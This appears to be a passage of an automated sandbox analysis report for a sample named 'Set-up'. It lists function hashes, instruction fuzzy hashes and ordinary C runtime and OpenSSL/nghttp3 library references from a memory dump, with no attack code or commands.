                                • Opcode ID: f35252e4e3167de2afbe0365010fbd69635b41997c29c3f107f0ac2a7b5f3905
                                • Instruction ID: e304eef3e6905e9abc7c98ea1cb8eaefe84fc1637aa27592cab3381e62850db1
                                • Opcode Fuzzy Hash: f35252e4e3167de2afbe0365010fbd69635b41997c29c3f107f0ac2a7b5f3905
                                • Instruction Fuzzy Hash: 71E1117050C7519FE3149E209885B6FBBF4AF95748F18882CF9CD5B282E3B59948CB92
                                APIs
                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00302212,00000000,00000000), ref: 00280109
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7262
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C7285
                                  • Part of subcall function 002C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72C5
                                  • Part of subcall function 002C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,002EBD91), ref: 002C72E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: strlen$strcpy
                                • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                                • API String ID: 2790333442-843477118
                                • Opcode ID: 3d45becf2307d87280054217aaad4f4874951b1c2830334ca9b96a2d7d21da5a
                                • Instruction ID: 78d6ba0e18468d1d225ebba03587c9fcd9751885a135ab71d4a887d62b7c9274
                                • Opcode Fuzzy Hash: 3d45becf2307d87280054217aaad4f4874951b1c2830334ca9b96a2d7d21da5a
                                • Instruction Fuzzy Hash: 79E17B7592D3118BD761AF28C8C171EB7E1AF91750F048B2DF8D8672D2E374D8688B82
                                APIs
                                • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,001BC1CE,?,00000003,?), ref: 001BE4EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _assert
                                • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                                • API String ID: 1222420520-1997541155
                                • Opcode ID: 85b9c6d69495a1eb46fc5097e910b14351f68016cbfb95ec148248e7916b50d8
                                • Instruction ID: e76a438fbbaa0273fbb45aa011d9813035402f5d7472981fa103ecdbe434c962
                                • Opcode Fuzzy Hash: 85b9c6d69495a1eb46fc5097e910b14351f68016cbfb95ec148248e7916b50d8
                                • Instruction Fuzzy Hash: 65E1F636B042105BD7199E3CC8907AAB7D7ABD9310F298A3CE9AAC73D1D735DC498781
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0037E5F2
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0037E67F
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0038003E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: ee48a486b07c62266a25f64f0da40119ab4e9c98a618147de80709643d9cc1b4
                                • Instruction ID: 5be72ae49c107ae1b209f9b8ff19f2c2a3f15bb6dedf114b6217d36f0a0c1ad0
                                • Opcode Fuzzy Hash: ee48a486b07c62266a25f64f0da40119ab4e9c98a618147de80709643d9cc1b4
                                • Instruction Fuzzy Hash: FCD21DAAC39B9541E323A63D68122E6E7506FFB188F51E72BFCD430E52AB2175C4431D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4$`$`
                                • API String ID: 0-1230936812
                                • Opcode ID: e887ad4ea8a8e4b117a696e2a99f48895c1e450cd412de6cd93cf9324d8c24b9
                                • Instruction ID: 5afb756ff95cf74fd6102e9b388dc4bbcbf1e7399fb738901456d5a5755ed1a1
                                • Opcode Fuzzy Hash: e887ad4ea8a8e4b117a696e2a99f48895c1e450cd412de6cd93cf9324d8c24b9
                                • Instruction Fuzzy Hash: 9CB2AE729087918FD724DF18C8806AEB7E1FFDA304F158B2EE89597352D734A945CB82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3316692f179c5ce35f6dcc091f6be814bba15671fb56969d987299f95063072d
                                • Instruction ID: 093f1eb2ef76103c1efc89f8267516bd5599f7fa527d4232ed408c19f725c7f8
                                • Opcode Fuzzy Hash: 3316692f179c5ce35f6dcc091f6be814bba15671fb56969d987299f95063072d
                                • Instruction Fuzzy Hash: 0CA2A171A04B169FC718CF29C49066AF7E1FF88314F15866ED8A987781E738F851CB86
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: $ $
                                • API String ID: 0-3665324030
                                • Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                • Instruction ID: c1a9677e246ee5991084521e55caf7d1ca6ced845747dc438c054a50b07fac47
                                • Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                • Instruction Fuzzy Hash: 0A620E75A083918FC364DF29C48066EFBE1BFC8310F158A2EE9D993351E734A945CB96
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
                                • API String ID: 0-2745174052
                                • Opcode ID: 4c8b42c1cd646d569992b1a95f6278074719a78b656e958e12ae0746bd47a4f8
                                • Instruction ID: a4a14759b0f039d7dc1ee5834419c1b22825dc50bd601dca30d73dab7303367a
                                • Opcode Fuzzy Hash: 4c8b42c1cd646d569992b1a95f6278074719a78b656e958e12ae0746bd47a4f8
                                • Instruction Fuzzy Hash: C2D1F5F1618346DBE7309E509C42F6BB7E5AF94704F04082CFA8957282E775E9289F62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 02afa273ca70b720c8404e3f2e37bf9e85459c899016e5e582fd554445c19d20
                                • Instruction ID: 0737f864d814a496d1498be871a72588d421c595b2be4cb73f197c26777f01b8
                                • Opcode Fuzzy Hash: 02afa273ca70b720c8404e3f2e37bf9e85459c899016e5e582fd554445c19d20
                                • Instruction Fuzzy Hash: D782AD72A087558FC724DF28C88026EF7E1BBC9704F158A2EE89897351D774A846CF86
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0037E16E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: providers/implementations/kdfs/argon2.c
                                • API String ID: 3510742995-3406374482
                                • Opcode ID: 1160b13eb7baddae630685b68fd6a5ffd5aef0f8edf6e82ac510346d98b08885
                                • Instruction ID: 1d32aa46a8b679c4800e6c796270c04c931478481af7e99a02bac1109465eac0
                                • Opcode Fuzzy Hash: 1160b13eb7baddae630685b68fd6a5ffd5aef0f8edf6e82ac510346d98b08885
                                • Instruction Fuzzy Hash: D0514771D087009BD311EB28D84169AF7E8FF98344F558E2DE989A3242E335FAC5CB85
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID: 0-3916222277
                                • Opcode ID: d0a88122eaa827a271982c4a1b272c7a9633f820a7eadb552972989f6300798c
                                • Instruction ID: d7ead81450ba1e28da34db363740f6388075e6eeac86139e1d539f70a416c867
                                • Opcode Fuzzy Hash: d0a88122eaa827a271982c4a1b272c7a9633f820a7eadb552972989f6300798c
                                • Instruction Fuzzy Hash: 84E25A31A083558FCB14CF69C19052EFBE2AFC8304F158A2EE99697365D774EC45CB86
                                APIs
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,004622FC,?,?), ref: 0046447B
                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00464760
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 358ed15464ce4ff703ec071bfbb152d6bcac2218497222b41f54ae776850abb8
                                • Instruction ID: 9aaf697bfa5963e990d10a0b6c3b8ef4d9eefb1632b2afc53cbaab9e97d70a80
                                • Opcode Fuzzy Hash: 358ed15464ce4ff703ec071bfbb152d6bcac2218497222b41f54ae776850abb8
                                • Instruction Fuzzy Hash: 14C17E75604B018FDB24CF29C480A66B7E1FFC6314F14892EE5AA87791E738F846CB56
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: \
                                • API String ID: 0-2967466578
                                • Opcode ID: bd2c75ea6b087697cdca8661bde95c0908b7568384f3788c73c953cd3409a4d7
                                • Instruction ID: 356302dfb0b1a1c673c1f78afbce32082cf51ef682ed3fc4283237bf4174a5a3
                                • Opcode Fuzzy Hash: bd2c75ea6b087697cdca8661bde95c0908b7568384f3788c73c953cd3409a4d7
                                • Instruction Fuzzy Hash: E402D5659043156BEB20BA24EC81B2B77D89F60346F44443BFC899A343F725ED1897A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: B<
                                • API String ID: 0-3658201093
                                • Opcode ID: c192deda3211ae04e625eaa6a6ad413eee95923b7e3cee61b1895764644a60cb
                                • Instruction ID: 7dfdcd02c517ec514ded3c41b4713aac6be665f99ce867c241bbc41294c84367
                                • Opcode Fuzzy Hash: c192deda3211ae04e625eaa6a6ad413eee95923b7e3cee61b1895764644a60cb
                                • Instruction Fuzzy Hash: C2D177F7E2054457DB0CDE38CC213A82692EB95335F5E8338FB769A3D6E238D9448684
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
                                • Instruction ID: c81854991488d9a8b7747c08fd0fe3874387d70027872776b127efeaf8eb2fa6
                                • Opcode Fuzzy Hash: b747d86157e915ba1c75205814a78b1ca71f2dcb168b0d02f440f493ee4b3f0d
                                • Instruction Fuzzy Hash: A6D103715087858FC715CF28C48067AFBF1BF8A354F098A6DE8DA97252D730E919CB92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                • Instruction ID: 35a28ca8d23b682cc5d21a1d1aa147d252d6c9c76d2d4419bec18cd053d31e4c
                                • Opcode Fuzzy Hash: e255173aa0bdf92621763e4c8bce104da3c96345eb545cdbf26f76a03c2a3c30
                                • Instruction Fuzzy Hash: 86A10472608B814FC715CF29C48063EB7E2AFCD310F5A862DE59597391E7B5DC868B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID: H
                                • API String ID: 0-2852464175
                                • Opcode ID: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                • Instruction ID: 99f4a7342f00c29f019821e788cbd077713a73078462d7e4f6a95217c69fa226
                                • Opcode Fuzzy Hash: 1281377b405c0dc38d01eef89cd8e034a28f4da2052d324015ae81e99efa89f5
                                • Instruction Fuzzy Hash: 4891A631708B918FCB1ACE1AC49012EB7E3BBCD314F1A853DD99697391DB719C868782
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000004), ref: 003005D5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: c1e94a208ed5702c72f175434111fa68bd7ff045661c52887c2302c3c9db3fed
                                • Instruction ID: f3cae6d049349afa2f139832386dcb57b3968686f965372555a926c0f92a72a4
                                • Opcode Fuzzy Hash: c1e94a208ed5702c72f175434111fa68bd7ff045661c52887c2302c3c9db3fed
                                • Instruction Fuzzy Hash: 7391B5715087419BDB0ACF38C4907AAB7E1BF89304F09CA68ED998B257E730D994CB51
                                APIs
                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000004), ref: 00300307
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID:
                                • API String ID: 3510742995-0
                                • Opcode ID: 9b856b150ec9f786700cdb2d9586f5478d288b1d7751d7541d3ce9911ac8295d
                                • Instruction ID: fc60d2a5b63f5c508f268dacadabc77433be744056cabc0334aef5ff64f2c17d
                                • Opcode Fuzzy Hash: 9b856b150ec9f786700cdb2d9586f5478d288b1d7751d7541d3ce9911ac8295d
                                • Instruction Fuzzy Hash: EB91B1719087419BDB0ACF38C491AAABBE1BFC9304F09CA6CEC999B257E730D944C751
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 06f9f47548c19ec0cf90f3b2b51f4bd5af00873d436c900020b7a9a13bdfe229
                                • Instruction ID: 318742efa52b8e9285f56b1e5e767cd9fca3aacccbb10039114056671854ea09
                                • Opcode Fuzzy Hash: 06f9f47548c19ec0cf90f3b2b51f4bd5af00873d436c900020b7a9a13bdfe229
                                • Instruction Fuzzy Hash: 5F725A3161831A8FCB14DF58D48076AB7E1FF89714F08893DE59983351EB74AD6ACB82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 77dfb65cc4a982bd202d2424377bd7942278464f85751133dc0a1e5f3d42f6ac
                                • Instruction ID: 4d268178a9fe2b399334f448a6b6ddc35f9280ab64ef39e4b6cdaa0e81b4b0c1
                                • Opcode Fuzzy Hash: 77dfb65cc4a982bd202d2424377bd7942278464f85751133dc0a1e5f3d42f6ac
                                • Instruction Fuzzy Hash: 5462C0726083519FC714CF6CC4D016EBBE2ABC9300F16C96EE99A87391D734E946DB86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5f7ea4bcae603839c541042fdb9e7650988698d3227ba519790db36be35b69e0
                                • Instruction ID: f0899b77cc5564cd9c55c7d0fcb3d6a06bed82ad60ec543ad71e198d4df04559
                                • Opcode Fuzzy Hash: 5f7ea4bcae603839c541042fdb9e7650988698d3227ba519790db36be35b69e0
                                • Instruction Fuzzy Hash: 77529034005E2BDACBA5EF65D4500AAB3B0FF42398F414D1EDA852F162C739E61BE790
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0b98328b7d0bfdc3eb178bab755277fb65260abeb499b4dcfc99ab23209255b0
                                • Instruction ID: ef07c03027e1e82058eae85e14135156e99b9beca7ed952ba02b5a53e09ea324
                                • Opcode Fuzzy Hash: 0b98328b7d0bfdc3eb178bab755277fb65260abeb499b4dcfc99ab23209255b0
                                • Instruction Fuzzy Hash: 4F02DA729043674FD721DE7DA0C0029FBE26B81389755497AD4FADB202F372DA4ACB94
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 935749e18c8c19243f1b01ddd69fe21fdf4f640950a2be19db7b006a01f61198
                                • Instruction ID: f67b6eea094e386c13e6f1857594b268bf814f0503da6693063efbf6b4d94a8a
                                • Opcode Fuzzy Hash: 935749e18c8c19243f1b01ddd69fe21fdf4f640950a2be19db7b006a01f61198
                                • Instruction Fuzzy Hash: 25027C715187058FC756EF0CD49032AF3E1FFC8309F198A2CD68987A65E739A9198F86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8b3056f0a65323c689dfdafc1c24162a5bdb991fe5f4bbf282bffdb634867a38
                                • Instruction ID: 40cf3a3ccdacf65c3f2c07056d3b83472ee5d92545c9f9c0222968db15295164
                                • Opcode Fuzzy Hash: 8b3056f0a65323c689dfdafc1c24162a5bdb991fe5f4bbf282bffdb634867a38
                                • Instruction Fuzzy Hash: 7FF19271C18BD596E7238B2CD8427EAF3A4BFE9344F04971EEDC872511EB3156468782
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
                                • Instruction ID: d5755f8efc461533690702e272520c716f16348202acd6742fa74deb82f10c08
                                • Opcode Fuzzy Hash: 8c15bf4492048ef30b56e1a346c55a17110d8bb22e10997e2877f6a1a6628987
                                • Instruction Fuzzy Hash: 65E1F132A087918BC7158F28C4845AEFBE0AFDA344F58CB1EE8D863352D775E984C742
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                • Instruction ID: b75660b2118933ab0c7f60c4a215909b95f834fd2aa744d2ac4ae283176d8be8
                                • Opcode Fuzzy Hash: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
                                • Instruction Fuzzy Hash: 53C1AB369097119BC714CF19C48026AFBE1FF84324F598A6EE8D697351E339EC91CB86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                • Instruction ID: 6c97bf2f38e5ff4bb8732d0d88e30f88865b286991f82e9d1af17e53a48e02f3
                                • Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
                                • Instruction Fuzzy Hash: 1AA18235A001598FDB38DE29CC91FDA73A2EB89314F0A8965EC599F391EB30AD45C7C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6ed5e51659f254ac8d97c3aa80c514e096db3ca2e0f11d24bce1dac7b46e4877
                                • Instruction ID: d8a35d3416ad447a1dc0595683b1b0b8a5b7ad1886d10b8918ed1532de070ebd
                                • Opcode Fuzzy Hash: 6ed5e51659f254ac8d97c3aa80c514e096db3ca2e0f11d24bce1dac7b46e4877
                                • Instruction Fuzzy Hash: 4AA1AD317083059FCB18DE6DD5D012EBBE2ABC4310F548A3EE8A687391D638EC51CB86
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: PerformanceQuery$CounterFrequency
                                • String ID:
                                • API String ID: 774501991-0
                                • Opcode ID: 297df35fc9c324c4412f2ad2fd4539c9f2781ec426ad63ed6e470f5847fb950d
                                • Instruction ID: 4d09daf966af3362af43ab2e6ea35e6eaf43d6ea62d8f2f9d4661b69698157aa
                                • Opcode Fuzzy Hash: 297df35fc9c324c4412f2ad2fd4539c9f2781ec426ad63ed6e470f5847fb950d
                                • Instruction Fuzzy Hash: AFC1D671914B419BD722CF39C881BE6F7E1BF99300F109E1EE5EA96241EB70B584CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: memset
                                • String ID:
                                • API String ID: 2221118986-0
                                • Opcode ID: 1c233dee3440c1507cbbda320d013e17a14ea223b8c58b346fb5df54bd4d9e71
                                • Instruction ID: 0f202df6744ddf0939d6e65e43de05ff43bdc0771181d72a7ec31e975b42c9f3
                                • Opcode Fuzzy Hash: 1c233dee3440c1507cbbda320d013e17a14ea223b8c58b346fb5df54bd4d9e71
                                • Instruction Fuzzy Hash: CF81F7B2D14F828BD3148F24C8906B6B7A1FFDB314F159B1EE8EA06742E7789580C745
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                                • Instruction ID: f9a33ec4b81729e17f43f22549c88f21198964be9e2d2c193c491faaec06cc0b
                                • Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                                • Instruction Fuzzy Hash: 387117751043058BC7199F6CD5C41A9FBE1BF88310F29CB6ED99A8B342D638EC95CB85
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                • Instruction ID: c52bf2c504138b26b42ed908ba7a4c58f17b406fe10f48980904cd6f44378ea7
                                • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                                • Instruction Fuzzy Hash: EF71E4715082168BD719AF6CE1C4169FBE1BF88300F198F6FD98987342D278ECA5CB45
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                • Instruction ID: efef31d1435a5fef92f7658ab0d288e74d4dd20d791594c617e0bf2cf3e8501f
                                • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                                • Instruction Fuzzy Hash: AD513939B1A3424BD704BE5C848026EB7D1FBA6324F2947BDD89A8B386C220DC16C781
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                • Instruction ID: a02bf752c567ac3183c10190017b84b331b3c40d81260d213e980c56b8a8d471
                                • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                                • Instruction Fuzzy Hash: C751B076A086258BD718EF19C1D002DFBE2BB88300F15CA6EDD9967741C374AD64DBC6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                Joe Sandbox IDA Plugin
